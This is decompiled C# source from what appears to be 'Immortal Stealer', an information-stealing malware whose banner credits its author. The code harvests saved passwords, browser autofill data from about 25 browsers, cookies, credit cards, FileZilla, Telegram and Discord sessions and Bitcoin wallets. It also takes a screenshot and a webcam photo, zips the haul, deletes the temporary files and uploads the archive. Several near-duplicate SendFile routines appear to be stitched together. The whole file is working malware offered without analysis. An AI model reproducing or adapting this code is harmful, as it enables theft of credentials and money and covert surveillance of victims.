// Token: 0x06000002 RID: 2 RVA: 0x000021C0 File Offset: 0x000003C0
public static void grab_forms(string string_0)
{
string environmentVariable = Environment.GetEnvironmentVariable("LocalAppData");
string[] array = new string[]
{
environmentVariable + "\\Google\\Chrome\\User Data\\Default\\Web Data",
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Web Data",
environmentVariable + "\\Kometa\\User Data\\Default\\Web Data",
environmentVariable + "\\Orbitum\\User Data\\Default\\Web Data",
environmentVariable + "\\Comodo\\Dragon\\User Data\\Default\\Web Data",
environmentVariable + "\\Amigo\\User\\User Data\\Default\\Web Data",
environmentVariable + "\\Torch\\User Data\\Default\\Web Data",
environmentVariable + "\\CentBrowser\\User Data\\Default\\Web Data",
environmentVariable + "\\Go!\\User Data\\Default\\Web Data",
environmentVariable + "\\uCozMedia\\Uran\\User Data\\Default\\Web Data",
environmentVariable + "\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data",
environmentVariable + "\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data",
environmentVariable + "\\BlackHawk\\User Data\\Default\\Web Data",
environmentVariable + "\\AcWebBrowser\\User Data\\Default\\Web Data",
environmentVariable + "\\CoolNovo\\User Data\\Default\\Web Data",
environmentVariable + "\\Epic Browser\\User Data\\Default\\Web Data",
environmentVariable + "\\Baidu Spark\\User Data\\Default\\Web Data",
environmentVariable + "\\Rockmelt\\User Data\\Default\\Web Data",
environmentVariable + "\\Sleipnir\\User Data\\Default\\Web Data",
environmentVariable + "\\SRWare Iron\\User Data\\Default\\Web Data",
environmentVariable + "\\Titan Browser\\User Data\\Default\\Web Data",
environmentVariable + "\\Flock\\User Data\\Default\\Web Data",
environmentVariable + "\\Vivaldi\\User Data\\Default\\Web Data",
environmentVariable + "\\Sputnik\\User Data\\Default\\Web Data",
environmentVariable + "\\Maxthon\\User Data\\Default\\Web Data"
};
foreach (string text in array)
{
try
{
string str = "";
bool flag = text.Contains("Chrome");
if (flag)
{
str = "Google";
}
bool flag2 = text.Contains("Yandex");
if (flag2)
{
str = "Yandex";
}
bool flag3 = text.Contains("Orbitum");
if (flag3)
{
str = "Orbitum";
}
bool flag4 = text.Contains("Opera");
if (flag4)
{
str = "Opera";
}
bool flag5 = text.Contains("Amigo");
if (flag5)
{
str = "Amigo";
}
bool flag6 = text.Contains("Torch");
if (flag6)
{
str = "Torch";
}
bool flag7 = text.Contains("Comodo");
if (flag7)
{
str = "Comodo";
}
bool flag8 = text.Contains("CentBrowser");
if (flag8)
{
str = "CentBrowser";
}
bool flag9 = text.Contains("Go!");
if (flag9)
{
str = "Go!";
}
bool flag10 = text.Contains("uCozMedia");
if (flag10)
{
str = "uCozMedia";
}
bool flag11 = text.Contains("MapleStudio");
if (flag11)
{
str = "MapleStudio";
}
bool flag12 = text.Contains("BlackHawk");
if (flag12)
{
str = "BlackHawk";
}
bool flag13 = text.Contains("CoolNovo");
if (flag13)
{
str = "CoolNovo";
}
bool flag14 = text.Contains("Vivaldi");
if (flag14)
{
str = "Vivaldi";
}
bool flag15 = text.Contains("Sputnik");
if (flag15)
{
str = "Sputnik";
}
bool flag16 = text.Contains("Maxthon");
if (flag16)
{
str = "Maxthon";
}
bool flag17 = text.Contains("AcWebBrowser");
if (flag17)
{
str = "AcWebBrowser";
}
bool flag18 = text.Contains("Epic Browser");
if (flag18)
{
str = "Epic Browser";
}
bool flag19 = text.Contains("Baidu Spark");
if (flag19)
{
str = "Baidu Spark";
}
bool flag20 = text.Contains("Rockmelt");
if (flag20)
{
str = "Rockmelt";
}
bool flag21 = text.Contains("Sleipnir");
if (flag21)
{
str = "Sleipnir";
}
bool flag22 = text.Contains("SRWare Iron");
if (flag22)
{
str = "SRWare Iron";
}
bool flag23 = text.Contains("Titan Browser");
if (flag23)
{
str = "Titan Browser";
}
bool flag24 = text.Contains("Flock");
if (flag24)
{
str = "Flock";
}
try
{
List <FormData> list = GrabForms.smethod_1(text);
bool flag25 = list != null;
if (flag25)
{
Directory.CreateDirectory(string_0 + "\\Autofill\\");
using (StreamWriter streamWriter = new StreamWriter(string_0 + "\\Autofill\\" + str + "_Autofill.txt"))
{
foreach (FormData formData in list)
{
streamWriter.Write(formData.Name + "\t" + formData.Value + "\r\n");
}
}
}
}
catch
{
}
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
}
public static void SendFile()
{
string randomString = Helper.GetRandomString();
string str1 = Path.GetTempPath() + randomString;
Directory.CreateDirectory(str1);
using (StreamWriter streamWriter = new StreamWriter(str1 + "\\Пароли.log"))
{
streamWriter.WriteLine(string.Format("Date: {0}\r\n", (object)DateTime.Now) + string.Format("Windows Username: {0}\r\n", (object)Environment.UserName) + string.Format("HWID: {0}\r\n", (object)RawSettings.HWID) + string.Format("System: {0}\r\n", (object)Passwords.GetWindowsVersion()));
try
{
foreach (PassData passData in Chromium.Initialise())
{
streamWriter.WriteLine((object)passData);
}
}
catch
{
}
}
try
{
Passwords.DesktopCopy(str1);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
}
catch
{
}
try
{
Passwords.get_screenshot(str1 + "\\desktop.jpg");
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Passwords.grab_minecraft(str1);
}
catch (Exception)
{
}
try
{
Passwords.Returgen.get_webcam(str1 + "\\CamPicture.png");
}
catch (Exception ex3)
{
Console.WriteLine(ex3.ToString());
}
try
{
Passwords.grab_telegram(str1);
}
catch (Exception)
{
}
try
{
Passwords.grab_discord(str1);
}
catch (Exception)
{
}
try
{
Cookies.Chromium.ChromiumInitialise(str1 + "\\");
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
CC.grab_cards(str1 + "\\");
}
catch (Exception ex5)
{
Console.WriteLine(ex5.ToString());
}
try
{
GrabForms.grab_forms(str1 + "\\");
}
catch (Exception ex6)
{
Console.WriteLine(ex6.ToString());
}
try
{
FilezillaFTP.FileZilla.Initialise(str1 + "\\");
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
string bitcoin = Crypto.get_bitcoin();
if (bitcoin != "" && File.Exists(bitcoin))
{
File.Copy(bitcoin, str1 + "\\wallet.dat");
}
}
catch (Exception ex8)
{
Console.WriteLine(ex8.ToString());
}
try
{
{
}
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Passwords.Zip(str1, Path.GetTempPath() + "\\" + randomString + ".zip");
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Passwords.RemoveTempFiles(str1);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Network.UploadFile(Path.GetTempPath() + "\\" + randomString + ".zip");
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
// Token: 0x06000029 RID: 41
public static void stealer_main_routine()
{
string text = Class8.Random_string();
string text2 = Path.GetTempPath() + text;
Directory.CreateDirectory(text2);
using (StreamWriter streamWriter = new StreamWriter(text2 + "\\passwords.log"))
{
streamWriter.WriteLine(string.Concat(new string[]
{
"[==================== Immortal Stealer/Clipper ====================]\r\n[=================== Create By Zet5D ===================]\r\n[=================== Telegram: @Zet5D ===================]\r\n",
string.Format("Date: {0}\r\n", DateTime.Now),
string.Format("Windows Username: {0}\r\n", Environment.UserName),
string.Format("HWID: {0}\r\n", Class2.hwid),
string.Format("System: {0}\r\n", Class9.define_windows())
}));
try
{
foreach (PassData value in Chromium.Initialise())
{
streamWriter.WriteLine(value);
}
}
catch
{
}
}
try
{
Class9.grab_desktop(text2);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Class9.grab_minecraft(text2);
}
catch (Exception)
{
}
try
{
Class9.grab_telegram(text2);
}
catch (Exception)
{
}
try
{
Class9.grab_discord(text2);
}
catch (Exception)
{
}
try
{
Class9.get_screenshot(text2 + "\\desktop.jpg");
}
catch (Exception ex2)
{
Console.WriteLine(ex2.ToString());
}
try
{
Class9.Class10.get_webcam(text2 + "\\CamPicture.png");
}
catch (Exception ex3)
{
Console.WriteLine(ex3.ToString());
}
try
{
Class4.grab_cookies(text2 + "\\");
}
catch (Exception ex4)
{
Console.WriteLine(ex4.ToString());
}
try
{
Class14.grab_cards(text2 + "\\");
}
catch (Exception ex5)
{
Console.WriteLine(ex5.ToString());
}
try
{
GrabForms.grab_forms(text2 + "\\");
}
catch (Exception ex6)
{
Console.WriteLine(ex6.ToString());
}
try
{
Class6.Class7.get_filezilla(text2 + "\\");
}
catch (Exception ex7)
{
Console.WriteLine(ex7.ToString());
}
try
{
string bitcoin = CryptoWallets.get_bitcoin();
if (bitcoin != "" && File.Exists(bitcoin))
{
File.Copy(bitcoin, text2 + "\\wallet.dat");
}
}
catch (Exception ex8)
{
Console.WriteLine(ex8.ToString());
}
try
{
Class9.zip_folder(text2, Path.GetTempPath() + "\\" + text + ".zip");
}
catch (Exception ex9)
{
Console.WriteLine(ex9.ToString());
}
try
{
Class9.delete_folder(text2);
}
catch (Exception ex10)
{
Console.WriteLine(ex10.ToString());
}
try
{
Internet.upload_file(Path.GetTempPath() + "\\" + text + ".zip");
}
catch (Exception ex11)
{
Console.WriteLine(ex11.ToString());
}
}
// Token: 0x0600002F RID: 47 RVA: 0x00004348 File Offset: 0x00002548
public static void SendFile()
{
string randomString = Helper.GetRandomString();
string text = Path.GetTempPath() + randomString;
Directory.CreateDirectory(text);
using (StreamWriter streamWriter = new StreamWriter(text + "\\pass.log"))
{
streamWriter.WriteLine(string.Format("Date: {0}\r\n", DateTime.Now) + string.Format("Windows Username: {0}\r\n", Environment.UserName) + string.Format("HWID: {0}\r\n", RawSettings.HWID) + string.Format("System: {0}\r\n", Passwords.GetWindowsVersion()));
try
{
foreach (PassData value in Chromium.Initialise())
{
streamWriter.WriteLine(value);
}
}
catch
{
}
}
try
{
Passwords.DesktopCopy(text);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
}
catch
{
}
try
{
Passwords.get_screenshot(text + "\\desktop.jpg");
}
catch (Exception ex2)
{
Console.WriteLine(ex2.ToString());
}
try
{
Passwords.grab_minecraft(text);
}
catch (Exception)
{
}
try
{
Passwords.Returgen.get_webcam(text + "\\CamPicture.png");
}
catch (Exception ex3)
{
Console.WriteLine(ex3.ToString());
}
try
{
Passwords.grab_telegram(text);
}
catch (Exception)
{
}
try
{
Passwords.grab_discord(text);
}
catch (Exception)
{
}
try
{
Chromium.ChromiumInitialise(text + "\\");
}
catch (Exception ex4)
{
Console.WriteLine(ex4.ToString());
}
try
{
CC.grab_cards(text + "\\");
}
catch (Exception ex5)
{
Console.WriteLine(ex5.ToString());
}
try
{
GrabForms.grab_forms(text + "\\");
}
catch (Exception ex6)
{
Console.WriteLine(ex6.ToString());
}
try
{
FilezillaFTP.FileZilla.Initialise(text + "\\");
}
catch (Exception ex7)
{
Console.WriteLine(ex7.ToString());
}
try
{
string bitcoin = Crypto.get_bitcoin();
bool flag = bitcoin != "" && File.Exists(bitcoin);
if (flag)
{
File.Copy(bitcoin, text + "\\wallet.dat");
}
}
catch (Exception ex8)
{
Console.WriteLine(ex8.ToString());
}
try
{
}
catch (Exception ex9)
{
Console.WriteLine(ex9.ToString());
}
try
{
Passwords.Zip(text, Path.GetTempPath() + "\\" + randomString + ".zip");
}
catch (Exception ex10)
{
Console.WriteLine(ex10.ToString());
}
try
{
Passwords.RemoveTempFiles(text);
}
catch (Exception ex11)
{
Console.WriteLine(ex11.ToString());
}
try
{
Network.UploadFile(Path.GetTempPath() + "\\" + randomString + ".zip");
}
catch (Exception ex12)
{
Console.WriteLine(ex12.ToString());
}
}